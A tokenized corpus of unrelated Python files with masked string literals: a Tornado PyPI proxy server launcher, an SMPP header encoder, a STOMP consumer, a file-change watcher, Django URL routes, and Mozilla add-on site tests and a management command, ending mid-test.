<s> import tempfile <EOL> import uuid <EOL> import errno <EOL> import signal <EOL> import pwd <EOL> import os <EOL> from slimurl import URL <EOL> from tornado . ioloop import IOLoop <EOL> from tornado . httpserver import HTTPServer <EOL> from tornado . log import gen_log as log <EOL> from tornado . options import options , define <EOL> from tornado . process import cpu_count <EOL> from tornado . concurrent import futures <EOL> from tornado . web import Application <EOL> from tornado . httpclient import AsyncHTTPClient <EOL> from tornado . ioloop import PeriodicCallback <EOL> from pypi_server import ROOT <EOL> from pypi_server . cache import HOUR , Cache <EOL> from pypi_server . handlers . pypi . proxy . client import PYPIClient <EOL> from pypi_server . db import init_db <EOL> from pypi_server . db . packages import PackageFile <EOL> from pypi_server import handlers <EOL> define ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> define ( "<STR_LIT:address>" , help = "<STR_LIT>" , <EOL> default = os . getenv ( '<STR_LIT>' , "<STR_LIT:127.0.0.1>" ) ) <EOL> define ( "<STR_LIT:port>" , help = "<STR_LIT>" , <EOL> type = int , default = int ( os . getenv ( '<STR_LIT>' , '<STR_LIT>' ) ) ) <EOL> define ( "<STR_LIT>" , help = "<STR_LIT>" , <EOL> default = bool ( os . getenv ( "<STR_LIT>" ) ) , type = bool ) <EOL> define ( "<STR_LIT>" , help = "<STR_LIT>" , <EOL> default = bool ( os . getenv ( "<STR_LIT>" , '<STR_LIT:0>' ) ) , type = bool ) <EOL> define ( "<STR_LIT>" , help = "<STR_LIT>" , <EOL> default = bool ( os . getenv ( '<STR_LIT>' , '<STR_LIT:1>' ) ) , type = bool ) <EOL> define ( "<STR_LIT>" , help = "<STR_LIT>" , <EOL> type = int , default = int ( os . getenv ( '<STR_LIT>' , cpu_count ( ) * <NUM_LIT:2> ) ) ) <EOL> define ( "<STR_LIT>" , help = "<STR_LIT>" , <EOL> default = os . getenv ( "<STR_LIT>" , uuid . uuid4 ( ) . 
bytes ) ) <EOL> define ( "<STR_LIT:user>" , help = "<STR_LIT>" , default = None ) <EOL> define ( <EOL> "<STR_LIT>" , help = "<STR_LIT>" , type = str , <EOL> default = os . path . abspath ( <EOL> os . getenv ( <EOL> "<STR_LIT>" , <EOL> os . path . join ( os . path . abspath ( os . path . curdir ) , '<STR_LIT>' ) <EOL> ) <EOL> ) <EOL> ) <EOL> define ( <EOL> "<STR_LIT>" , help = "<STR_LIT>" , <EOL> type = URL , <EOL> default = os . getenv ( <EOL> "<STR_LIT>" , <EOL> URL ( <EOL> "<STR_LIT>" . format ( "<STR_LIT:/>" . join ( <EOL> os . path . split ( os . path . join ( os . path . abspath ( os . path . curdir ) , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> ) ) <EOL> ) <EOL> ) <EOL> ) <EOL> define ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> default = int ( os . getenv ( "<STR_LIT>" , '<STR_LIT>' ) ) , type = int ) <EOL> define ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> default = URL ( os . getenv ( "<STR_LIT>" , '<STR_LIT>' ) ) , type = URL ) <EOL> default_cache_dir = os . path . join ( tempfile . gettempdir ( ) , '<STR_LIT>' ) <EOL> define ( <EOL> "<STR_LIT>" , <EOL> help = '<STR_LIT>' . format ( default_cache_dir ) , <EOL> default = default_cache_dir <EOL> ) <EOL> def create_app ( debug = False , secret = "<STR_LIT>" , gzip = False , ** kwargs ) : <EOL> return Application ( <EOL> base_dir = ROOT , <EOL> debug = debug , <EOL> reload = debug , <EOL> cookie_secret = secret , <EOL> template_path = os . path . join ( ROOT , '<STR_LIT>' ) , <EOL> default_handler_class = handlers . DefaultHandler , <EOL> gzip = gzip , <EOL> handlers = handlers . ROUTES , <EOL> options = options , <EOL> ** kwargs <EOL> ) <EOL> def run ( ) : <EOL> options . parse_command_line ( ) <EOL> if options . config : <EOL> options . parse_config_file ( options . config ) <EOL> options . storage = os . path . abspath ( options . storage ) <EOL> if os . getuid ( ) == <NUM_LIT:0> and options . user : <EOL> pw = pwd . getpwnam ( options . user ) <EOL> uid , gid = pw . pw_uid , pw . pw_gid <EOL> log . 
info ( "<STR_LIT>" , options . user , uid , gid ) <EOL> os . setgid ( uid ) <EOL> os . setuid ( uid ) <EOL> try : <EOL> if not all ( f ( options . storage ) for f in ( os . path . exists , os . path . isdir ) ) : <EOL> log . info ( '<STR_LIT>' , options . storage ) <EOL> os . makedirs ( options . storage ) <EOL> def on_interrupt ( * args ) : <EOL> log . warning ( "<STR_LIT>" ) <EOL> exit ( errno . EINTR ) <EOL> log . debug ( "<STR_LIT>" ) <EOL> for sig in ( signal . SIGINT , signal . SIGTERM , signal . SIGQUIT ) : <EOL> signal . signal ( sig , on_interrupt ) <EOL> def handle_pdb ( sig , frame ) : <EOL> import pdb <EOL> pdb . Pdb ( ) . set_trace ( frame ) <EOL> if options . debug : <EOL> signal . signal ( signal . SIGUSR2 , handle_pdb ) <EOL> log . debug ( "<STR_LIT>" ) <EOL> app = create_app ( <EOL> options . debug , <EOL> options . secret , <EOL> options . gzip , <EOL> ) <EOL> log . debug ( "<STR_LIT>" ) <EOL> io_loop = IOLoop . current ( ) <EOL> io_loop . run_sync ( lambda : init_db ( options . database ) ) <EOL> if not ( os . path . exists ( options . cache_dir ) and os . path . isdir ( options . cache_dir ) ) : <EOL> os . makedirs ( options . cache_dir ) <EOL> Cache . CACHE_DIR = options . cache_dir <EOL> log . info ( "<STR_LIT>" , options . pool_size ) <EOL> handlers . base . BaseHandler . THREAD_POOL = futures . ThreadPoolExecutor ( options . pool_size ) <EOL> AsyncHTTPClient . configure ( None , max_clients = options . max_http_clients ) <EOL> PYPIClient . configure ( <EOL> options . pypi_server , <EOL> handlers . base . BaseHandler . THREAD_POOL <EOL> ) <EOL> pypi_updater = PeriodicCallback ( PYPIClient . packages , HOUR * <NUM_LIT:1000> , io_loop ) <EOL> io_loop . add_callback ( PYPIClient . packages ) <EOL> io_loop . add_callback ( pypi_updater . start ) <EOL> log . info ( "<STR_LIT>" , options . address , options . port ) <EOL> http_server = HTTPServer ( app , xheaders = options . proxy_mode ) <EOL> http_server . listen ( options . 
port , address = options . address ) <EOL> log . debug ( '<STR_LIT>' , options . storage ) <EOL> PackageFile . set_storage ( options . storage ) <EOL> log . debug ( "<STR_LIT>" ) <EOL> io_loop . start ( ) <EOL> except Exception as e : <EOL> log . fatal ( "<STR_LIT>" ) <EOL> log . exception ( e ) <EOL> exit ( <NUM_LIT:1> ) <EOL> else : <EOL> exit ( <NUM_LIT:0> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> run ( ) </s>
<s> from amdevice import * <EOL> from afc import * <EOL> class AFCRoot ( AFC ) : <EOL> def __init__ ( self , amdevice ) : <EOL> s = amdevice . start_service ( u'<STR_LIT>' ) <EOL> if s is None : <EOL> raise RuntimeError ( u'<STR_LIT>' , u'<STR_LIT>' ) <EOL> AFC . __init__ ( self , s ) </s>
<s> """<STR_LIT>""" <EOL> import struct <EOL> from smpp . pdu import gsm_constants , gsm_types <EOL> from smpp . pdu . encoding import IEncoder <EOL> from smpp . pdu . error import PDUParseError <EOL> class UDHParseError ( Exception ) : <EOL> pass <EOL> class UDHInformationElementIdentifierUnknownError ( UDHParseError ) : <EOL> pass <EOL> class Int8Encoder ( IEncoder ) : <EOL> def encode ( self , value ) : <EOL> return struct . pack ( '<STR_LIT>' , value ) <EOL> def decode ( self , file ) : <EOL> byte = self . read ( file , <NUM_LIT:1> ) <EOL> return struct . unpack ( '<STR_LIT>' , byte ) [ <NUM_LIT:0> ] <EOL> class Int16Encoder ( IEncoder ) : <EOL> def encode ( self , value ) : <EOL> return struct . pack ( '<STR_LIT>' , value ) <EOL> def decode ( self , file ) : <EOL> bytes = self . read ( file , <NUM_LIT:2> ) <EOL> return struct . unpack ( '<STR_LIT>' , bytes ) [ <NUM_LIT:0> ] <EOL> class InformationElementIdentifierEncoder ( IEncoder ) : <EOL> int8Encoder = Int8Encoder ( ) <EOL> nameMap = gsm_constants . information_element_identifier_name_map <EOL> valueMap = gsm_constants . information_element_identifier_value_map <EOL> def encode ( self , value ) : <EOL> name = str ( value ) <EOL> if name not in self . nameMap : <EOL> raise ValueError ( "<STR_LIT>" % name ) <EOL> return self . int8Encoder . encode ( self . nameMap [ name ] ) <EOL> def decode ( self , file ) : <EOL> intVal = self . int8Encoder . decode ( file ) <EOL> if intVal not in self . valueMap : <EOL> errStr = "<STR_LIT>" % intVal <EOL> raise UDHInformationElementIdentifierUnknownError ( errStr ) <EOL> name = self . valueMap [ intVal ] <EOL> return getattr ( gsm_types . InformationElementIdentifier , name ) <EOL> class IEConcatenatedSMEncoder ( IEncoder ) : <EOL> int8Encoder = Int8Encoder ( ) <EOL> int16Encoder = Int16Encoder ( ) <EOL> def __init__ ( self , is16bitRefNum ) : <EOL> self . is16bitRefNum = is16bitRefNum <EOL> def encode ( self , cms ) : <EOL> bytes = '<STR_LIT>' <EOL> if self . 
is16bitRefNum : <EOL> bytes += self . int16Encoder . encode ( cms . referenceNum ) <EOL> else : <EOL> bytes += self . int8Encoder . encode ( cms . referenceNum ) <EOL> bytes += self . int8Encoder . encode ( cms . maximumNum ) <EOL> bytes += self . int8Encoder . encode ( cms . sequenceNum ) <EOL> return bytes <EOL> def decode ( self , file ) : <EOL> refNum = None <EOL> if self . is16bitRefNum : <EOL> refNum = self . int16Encoder . decode ( file ) <EOL> else : <EOL> refNum = self . int8Encoder . decode ( file ) <EOL> maxNum = self . int8Encoder . decode ( file ) <EOL> seqNum = self . int8Encoder . decode ( file ) <EOL> return gsm_types . IEConcatenatedSM ( refNum , maxNum , seqNum ) <EOL> class InformationElementEncoder ( IEncoder ) : <EOL> int8Encoder = Int8Encoder ( ) <EOL> iEIEncoder = InformationElementIdentifierEncoder ( ) <EOL> dataEncoders = { <EOL> gsm_types . InformationElementIdentifier . CONCATENATED_SM_8BIT_REF_NUM : IEConcatenatedSMEncoder ( False ) , <EOL> gsm_types . InformationElementIdentifier . CONCATENATED_SM_16BIT_REF_NUM : IEConcatenatedSMEncoder ( True ) , <EOL> } <EOL> def encode ( self , iElement ) : <EOL> dataBytes = None <EOL> if iElement . identifier in self . dataEncoders : <EOL> dataBytes = self . dataEncoders [ iElement . identifier ] . encode ( iElement . data ) <EOL> else : <EOL> dataBytes = iElement . data <EOL> length = len ( dataBytes ) <EOL> bytes = '<STR_LIT>' <EOL> bytes += self . iEIEncoder . encode ( iElement . identifier ) <EOL> bytes += self . int8Encoder . encode ( length ) <EOL> bytes += dataBytes <EOL> return bytes <EOL> def decode ( self , file ) : <EOL> fStart = file . tell ( ) <EOL> identifier = None <EOL> try : <EOL> identifier = self . iEIEncoder . decode ( file ) <EOL> except UDHInformationElementIdentifierUnknownError : <EOL> pass <EOL> length = self . int8Encoder . decode ( file ) <EOL> data = None <EOL> if identifier in self . dataEncoders : <EOL> data = self . dataEncoders [ identifier ] . 
decode ( file ) <EOL> elif length > <NUM_LIT:0> : <EOL> data = self . read ( file , length ) <EOL> parsed = file . tell ( ) - fStart <EOL> if parsed != length + <NUM_LIT:2> : <EOL> raise UDHParseError ( "<STR_LIT>" % ( length + <NUM_LIT:2> , parsed ) ) <EOL> if identifier is None : <EOL> return None <EOL> return gsm_types . InformationElement ( identifier , data ) <EOL> class UserDataHeaderEncoder ( IEncoder ) : <EOL> iEEncoder = InformationElementEncoder ( ) <EOL> int8Encoder = Int8Encoder ( ) <EOL> def encode ( self , udh ) : <EOL> nonRepeatable = { } <EOL> iEBytes = '<STR_LIT>' <EOL> for iElement in udh : <EOL> if not self . isIdentifierRepeatable ( iElement . identifier ) : <EOL> if iElement . identifier in nonRepeatable : <EOL> raise ValueError ( "<STR_LIT>" % str ( iElement . identifier ) ) <EOL> for identifier in self . getIdentifierExclusionList ( iElement . identifier ) : <EOL> if identifier in nonRepeatable : <EOL> raise ValueError ( "<STR_LIT>" % ( str ( iElement . identifier ) , str ( identifier ) ) ) <EOL> nonRepeatable [ iElement . identifier ] = None <EOL> iEBytes += self . iEEncoder . encode ( iElement ) <EOL> headerLen = len ( iEBytes ) <EOL> return self . int8Encoder . encode ( headerLen ) + iEBytes <EOL> def decode ( self , file ) : <EOL> repeatable = [ ] <EOL> nonRepeatable = { } <EOL> headerLen = self . int8Encoder . decode ( file ) <EOL> while file . tell ( ) < headerLen + <NUM_LIT:1> : <EOL> iStart = file . tell ( ) <EOL> iElement = self . iEEncoder . decode ( file ) <EOL> if iElement is not None : <EOL> if self . isIdentifierRepeatable ( iElement . identifier ) : <EOL> repeatable . append ( iElement ) <EOL> else : <EOL> nonRepeatable [ iElement . identifier ] = iElement <EOL> for identifier in self . getIdentifierExclusionList ( iElement . identifier ) : <EOL> if identifier in nonRepeatable : <EOL> del nonRepeatable [ identifier ] <EOL> bytesRead = file . tell ( ) - iStart <EOL> return repeatable + nonRepeatable . 
values ( ) <EOL> def isIdentifierRepeatable ( self , identifier ) : <EOL> return gsm_constants . information_element_identifier_full_value_map [ gsm_constants . information_element_identifier_name_map [ str ( identifier ) ] ] [ '<STR_LIT>' ] <EOL> def getIdentifierExclusionList ( self , identifier ) : <EOL> nameList = gsm_constants . information_element_identifier_full_value_map [ gsm_constants . information_element_identifier_name_map [ str ( identifier ) ] ] [ '<STR_LIT>' ] <EOL> return [ getattr ( gsm_types . InformationElementIdentifier , name ) for name in nameList ] </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import simplejson <EOL> from twisted . internet import reactor , defer <EOL> from stompest . async import StompConfig , StompCreator <EOL> class Consumer ( object ) : <EOL> QUEUE = '<STR_LIT>' <EOL> ERROR_QUEUE = '<STR_LIT>' <EOL> def __init__ ( self , config = None ) : <EOL> if config is None : <EOL> config = StompConfig ( '<STR_LIT:localhost>' , <NUM_LIT> ) <EOL> self . config = config <EOL> @ defer . inlineCallbacks <EOL> def run ( self ) : <EOL> stomp = yield StompCreator ( self . config ) . getConnection ( ) <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:100> , <EOL> } <EOL> stomp . subscribe ( self . QUEUE , self . consume , headers , errorDestination = self . ERROR_QUEUE ) <EOL> def consume ( self , stomp , frame ) : <EOL> """<STR_LIT>""" <EOL> data = simplejson . loads ( frame [ '<STR_LIT:body>' ] ) <EOL> print "<STR_LIT>" % data [ '<STR_LIT:count>' ] <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> Consumer ( ) . run ( ) <EOL> reactor . run ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> import time <EOL> _mtimes = { } <EOL> def timecheck ( files ) : <EOL> """<STR_LIT>""" <EOL> global _mtimes <EOL> for filename in files : <EOL> mtime = os . stat ( filename ) . st_mtime <EOL> if filename not in _mtimes : <EOL> _mtimes [ filename ] = mtime <EOL> elif mtime != _mtimes [ filename ] : <EOL> _mtimes = { } <EOL> return True <EOL> else : <EOL> return False <EOL> def watcher ( command , files ) : <EOL> """<STR_LIT>""" <EOL> while True : <EOL> if timecheck ( files ) : <EOL> os . system ( command ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> def main ( ) : <EOL> command , files = sys . argv [ <NUM_LIT:1> ] , sys . argv [ <NUM_LIT:2> : ] <EOL> try : <EOL> watcher ( command , files ) <EOL> except KeyboardInterrupt : <EOL> pass <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from django . conf . urls import url <EOL> from . import views <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , views . AuthenticateView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . AuthenticateView . as_view ( ) ) , <EOL> url ( r'<STR_LIT>' , views . LoginView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . ProfileView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . RegisterView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . AccountSourceView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . AccountSuperCreate . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> ] </s>
<s> from mock import Mock <EOL> from pyquery import PyQuery <EOL> from olympia import amo <EOL> from olympia . amo . tests import TestCase <EOL> from olympia . addons . helpers import ( <EOL> statusflags , flag , contribution , mobile_persona_preview , <EOL> mobile_persona_confirm ) <EOL> from olympia . addons . models import Addon <EOL> class TestHelpers ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> def test_statusflags ( self ) : <EOL> ctx = { '<STR_LIT>' : amo . FIREFOX , '<STR_LIT>' : '<STR_LIT>' } <EOL> a = Addon ( status = amo . STATUS_UNREVIEWED ) <EOL> assert statusflags ( ctx , a ) == '<STR_LIT>' <EOL> featured = Addon . objects . get ( pk = <NUM_LIT> ) <EOL> assert statusflags ( ctx , featured ) == '<STR_LIT>' <EOL> featured = Addon . objects . get ( pk = <NUM_LIT> ) <EOL> assert statusflags ( ctx , featured ) == '<STR_LIT>' <EOL> def test_flags ( self ) : <EOL> ctx = { '<STR_LIT>' : amo . FIREFOX , '<STR_LIT>' : '<STR_LIT>' } <EOL> a = Addon ( status = amo . STATUS_UNREVIEWED ) <EOL> assert flag ( ctx , a ) == '<STR_LIT>' <EOL> featured = Addon . objects . get ( pk = <NUM_LIT> ) <EOL> assert flag ( ctx , featured ) == '<STR_LIT>' <EOL> featured = Addon . objects . get ( pk = <NUM_LIT> ) <EOL> assert flag ( ctx , featured ) == '<STR_LIT>' <EOL> def test_contribution_box ( self ) : <EOL> a = Addon . objects . get ( pk = <NUM_LIT> ) <EOL> a . suggested_amount = '<STR_LIT>' <EOL> settings = Mock ( ) <EOL> settings . MAX_CONTRIBUTION = <NUM_LIT:5> <EOL> request = Mock ( ) <EOL> request . GET = { '<STR_LIT:src>' : '<STR_LIT>' } <EOL> c = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : amo . FIREFOX , '<STR_LIT>' : settings , <EOL> '<STR_LIT>' : request } <EOL> s = contribution ( c , a ) <EOL> doc = PyQuery ( s ) <EOL> assert doc ( '<STR_LIT>' ) . length == <NUM_LIT:1> <EOL> def test_src_retained ( self ) : <EOL> a = Addon . objects . get ( pk = <NUM_LIT> ) <EOL> a . 
suggested_amount = '<STR_LIT>' <EOL> settings = Mock ( ) <EOL> settings . MAX_CONTRIBUTION = <NUM_LIT:5> <EOL> request = Mock ( ) <EOL> c = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : amo . FIREFOX , '<STR_LIT>' : settings , <EOL> '<STR_LIT>' : request } <EOL> s = contribution ( c , a , contribution_src = '<STR_LIT>' ) <EOL> doc = PyQuery ( s ) <EOL> assert doc ( '<STR_LIT>' ) . attr ( '<STR_LIT:value>' ) == '<STR_LIT>' <EOL> def test_mobile_persona_preview ( self ) : <EOL> ctx = { '<STR_LIT>' : amo . FIREFOX , '<STR_LIT>' : '<STR_LIT>' } <EOL> persona = Addon . objects . get ( pk = <NUM_LIT> ) . persona <EOL> s = mobile_persona_preview ( ctx , persona ) <EOL> doc = PyQuery ( s ) <EOL> bt = doc ( '<STR_LIT>' ) <EOL> assert bt <EOL> assert persona . preview_url in bt . attr ( '<STR_LIT>' ) <EOL> assert persona . json_data == bt . attr ( '<STR_LIT>' ) <EOL> assert bt . find ( '<STR_LIT:p>' ) <EOL> def _test_mobile_persona_ctx ( self ) : <EOL> request = Mock ( ) <EOL> request . APP = amo . FIREFOX <EOL> request . GET = { } <EOL> request . user . is_authenticated . return_value = False <EOL> request . user . mobile_addons = [ ] <EOL> return { '<STR_LIT>' : amo . FIREFOX , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : request } <EOL> def test_mobile_persona_confirm_large ( self ) : <EOL> persona = Addon . objects . get ( id = <NUM_LIT> ) . persona <EOL> s = mobile_persona_confirm ( self . _test_mobile_persona_ctx ( ) , persona ) <EOL> doc = PyQuery ( s ) <EOL> assert not doc ( '<STR_LIT>' ) <EOL> assert doc ( '<STR_LIT>' ) <EOL> assert doc ( '<STR_LIT>' ) <EOL> assert doc ( '<STR_LIT>' ) <EOL> assert not doc ( '<STR_LIT>' ) <EOL> def test_mobile_persona_confirm_small ( self ) : <EOL> persona = Addon . objects . get ( id = <NUM_LIT> ) . persona <EOL> s = mobile_persona_confirm ( self . 
_test_mobile_persona_ctx ( ) , persona , <EOL> size = '<STR_LIT>' ) <EOL> doc = PyQuery ( s ) <EOL> assert doc ( '<STR_LIT>' ) <EOL> assert not doc ( '<STR_LIT>' ) <EOL> assert doc ( '<STR_LIT>' ) <EOL> assert doc ( '<STR_LIT>' ) <EOL> more = doc ( '<STR_LIT>' ) <EOL> assert more <EOL> assert more . attr ( '<STR_LIT>' ) == persona . addon . get_url_path ( ) </s>
<s> import os <EOL> import re <EOL> from django . conf import settings <EOL> from django . core . files . storage import default_storage as storage <EOL> from django . core . management . base import BaseCommand <EOL> from olympia . amo . storage_utils import walk_storage <EOL> _loc_re = re . compile ( r"""<STR_LIT>""" , ( re . M | re . S ) ) <EOL> _exts = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> _root = settings . ROOT <EOL> _subs = tuple ( [ os . path . join ( _root , s ) for s in [ '<STR_LIT>' ] ] ) <EOL> class Command ( BaseCommand ) : <EOL> """<STR_LIT>""" <EOL> def handle ( self , * args , ** options ) : <EOL> count = <NUM_LIT:0> <EOL> for root , folders , files in walk_storage ( _root ) : <EOL> if not root . startswith ( _subs ) : <EOL> continue <EOL> for fname in files : <EOL> fname = os . path . join ( root , fname ) <EOL> if fname . endswith ( _exts ) : <EOL> data = storage . open ( fname ) . read ( ) <EOL> found = False <EOL> for match in _loc_re . finditer ( data ) : <EOL> if not found : <EOL> found = True <EOL> print fname <EOL> print '<STR_LIT:->' * len ( fname ) <EOL> print match . string [ match . start ( ) : match . end ( ) ] <EOL> count += <NUM_LIT:1> <EOL> if found : <EOL> print <EOL> print '<STR_LIT>' , count </s>
<s> from pyquery import PyQuery as pq <EOL> from olympia . amo . tests import TestCase <EOL> from services . pfs import get_output <EOL> class TestPfs ( TestCase ) : <EOL> def test_xss ( self ) : <EOL> for k in [ '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:version>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] : <EOL> res = get_output ( { k : '<STR_LIT>' } ) <EOL> assert not pq ( res ) ( '<STR_LIT>' ) </s>
<s> from django . contrib . auth . models import AnonymousUser <EOL> from django . test import RequestFactory <EOL> from mock import Mock <EOL> from rest_framework . authentication import SessionAuthentication <EOL> from rest_framework . permissions import AllowAny , BasePermission <EOL> from rest_framework . response import Response <EOL> from rest_framework . views import APIView <EOL> from olympia . access . models import Group , GroupUser <EOL> from olympia . addons . models import Addon <EOL> from olympia . api . permissions import ( <EOL> AllowAddonAuthor , AllowReadOnlyIfPublicAndListed , AllowReviewer , <EOL> AllowReviewerUnlisted , AnyOf , GroupPermission ) <EOL> from olympia . amo . tests import TestCase , WithDynamicEndpoints <EOL> from olympia . users . models import UserProfile <EOL> class ProtectedView ( APIView ) : <EOL> authentication_classes = [ SessionAuthentication ] <EOL> permission_classes = [ GroupPermission ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> def get ( self , request ) : <EOL> return Response ( '<STR_LIT>' ) <EOL> class AllowNone ( BasePermission ) : <EOL> """<STR_LIT>""" <EOL> def has_permission ( self , request , view ) : <EOL> return False <EOL> def has_object_permission ( self , request , view , obj ) : <EOL> return False <EOL> def myview ( * args , ** kwargs ) : <EOL> pass <EOL> class TestGroupPermissionOnView ( WithDynamicEndpoints ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def setUp ( self ) : <EOL> super ( TestGroupPermissionOnView , self ) . setUp ( ) <EOL> self . endpoint ( ProtectedView ) <EOL> self . url = '<STR_LIT>' <EOL> email = '<STR_LIT>' <EOL> self . user = UserProfile . objects . get ( email = email ) <EOL> group = Group . objects . create ( rules = '<STR_LIT>' ) <EOL> GroupUser . objects . create ( group = group , user = self . user ) <EOL> assert self . client . login ( username = email , <EOL> password = '<STR_LIT:password>' ) <EOL> def test_user_must_be_in_required_group ( self ) : <EOL> self . user . groups . 
all ( ) . delete ( ) <EOL> res = self . client . get ( self . url ) <EOL> assert res . status_code == <NUM_LIT> , res . content <EOL> assert res . data [ '<STR_LIT>' ] == ( <EOL> '<STR_LIT>' ) <EOL> def test_view_is_executed ( self ) : <EOL> res = self . client . get ( self . url ) <EOL> assert res . status_code == <NUM_LIT:200> , res . content <EOL> assert res . content == '<STR_LIT>' <EOL> class TestGroupPermission ( TestCase ) : <EOL> def test_user_cannot_be_anonymous ( self ) : <EOL> request = RequestFactory ( ) . get ( '<STR_LIT:/>' ) <EOL> request . user = AnonymousUser ( ) <EOL> view = Mock ( ) <EOL> perm = GroupPermission ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert not perm . has_permission ( request , view ) <EOL> class TestAnyOf ( TestCase ) : <EOL> def test_has_permission ( self ) : <EOL> request = RequestFactory ( ) . get ( '<STR_LIT:/>' ) <EOL> assert AnyOf ( AllowNone , AllowAny ) ( ) . has_permission ( request , myview ) <EOL> assert AnyOf ( AllowAny , AllowNone ) ( ) . has_permission ( request , myview ) <EOL> def test_has_permission_fail ( self ) : <EOL> request = RequestFactory ( ) . get ( '<STR_LIT:/>' ) <EOL> assert not AnyOf ( AllowNone , AllowNone ) ( ) . has_permission ( <EOL> request , myview ) <EOL> def test_has_object_permission ( self ) : <EOL> request = RequestFactory ( ) . get ( '<STR_LIT:/>' ) <EOL> assert AnyOf ( AllowNone , AllowAny ) ( ) . has_object_permission ( <EOL> request , myview , None ) <EOL> assert AnyOf ( AllowAny , AllowNone ) ( ) . has_object_permission ( <EOL> request , myview , None ) <EOL> def test_has_object_permission_fail ( self ) : <EOL> request = RequestFactory ( ) . get ( '<STR_LIT:/>' ) <EOL> assert not AnyOf ( AllowNone , AllowNone ) ( ) . 
has_object_permission ( <EOL> request , myview , None ) <EOL> def test_has_object_permission_partial_fail ( self ) : <EOL> """<STR_LIT>""" <EOL> class NoObjectPerm ( BasePermission ) : <EOL> def has_permission ( self , request , view ) : <EOL> return False <EOL> class NoPerm ( BasePermission ) : <EOL> def has_object_permission ( self , request , view , obj ) : <EOL> return False <EOL> request = RequestFactory ( ) . get ( '<STR_LIT:/>' ) <EOL> assert not AnyOf ( NoObjectPerm , NoPerm ) ( ) . has_object_permission ( <EOL> request , myview , None ) <EOL> class TestAllowAddonAuthor ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def setUp ( self ) : <EOL> self . addon = Addon . objects . get ( pk = <NUM_LIT> ) <EOL> self . permission = AllowAddonAuthor ( ) <EOL> self . owner = self . addon . authors . all ( ) [ <NUM_LIT:0> ] <EOL> self . request = RequestFactory ( ) . get ( '<STR_LIT:/>' ) <EOL> self . request . user = AnonymousUser ( ) <EOL> def test_has_permission_anonymous ( self ) : <EOL> assert not self . permission . has_permission ( self . request , myview ) <EOL> def test_has_permission_any_authenticated_user ( self ) : <EOL> self . request . user = UserProfile . objects . get ( pk = <NUM_LIT> ) <EOL> assert self . request . user not in self . addon . authors . all ( ) <EOL> assert self . permission . has_permission ( self . request , myview ) <EOL> def test_has_object_permission_user ( self ) : <EOL> self . request . user = self . owner <EOL> assert self . permission . has_object_permission ( <EOL> self . request , myview , self . addon ) <EOL> def test_has_object_permission_different_user ( self ) : <EOL> self . request . user = UserProfile . objects . get ( pk = <NUM_LIT> ) <EOL> assert self . request . user not in self . addon . authors . all ( ) <EOL> assert not self . permission . has_object_permission ( <EOL> self . request , myview , self . addon ) <EOL> def test_has_object_permission_anonymous ( self ) : <EOL> assert not self . 
permission . has_object_permission ( <EOL> self . request , myview , self . addon ) <EOL> class TestAllowReviewer ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def setUp ( self ) : <EOL> self . permission = AllowReviewer ( ) <EOL> self . request_factory = RequestFactory ( ) <EOL> self . unsafe_methods = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . safe_methods = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_user_cannot_be_anonymous ( self ) : <EOL> request = self . request_factory . get ( '<STR_LIT:/>' ) <EOL> request . user = AnonymousUser ( ) <EOL> assert not self . permission . has_permission ( request , myview ) <EOL> assert not self . permission . has_object_permission ( <EOL> request , myview , Mock ( ) ) <EOL> def test_authenticated_but_not_reviewer ( self ) : <EOL> request = self . request_factory . get ( '<STR_LIT:/>' ) <EOL> request . user = UserProfile . objects . get ( pk = <NUM_LIT> ) <EOL> assert not self . permission . has_permission ( request , myview ) <EOL> assert not self . permission . has_object_permission ( <EOL> request , myview , Mock ( ) ) <EOL> def test_admin ( self ) : <EOL> user = UserProfile . objects . get ( email = '<STR_LIT>' ) <EOL> for method in self . safe_methods + self . unsafe_methods : <EOL> request = getattr ( self . request_factory , method ) ( '<STR_LIT:/>' ) <EOL> request . user = user <EOL> assert self . permission . has_permission ( request , myview ) <EOL> assert self . permission . has_object_permission ( <EOL> request , myview , Mock ( ) ) <EOL> def test_reviewer_tools_access_read_only ( self ) : <EOL> user = 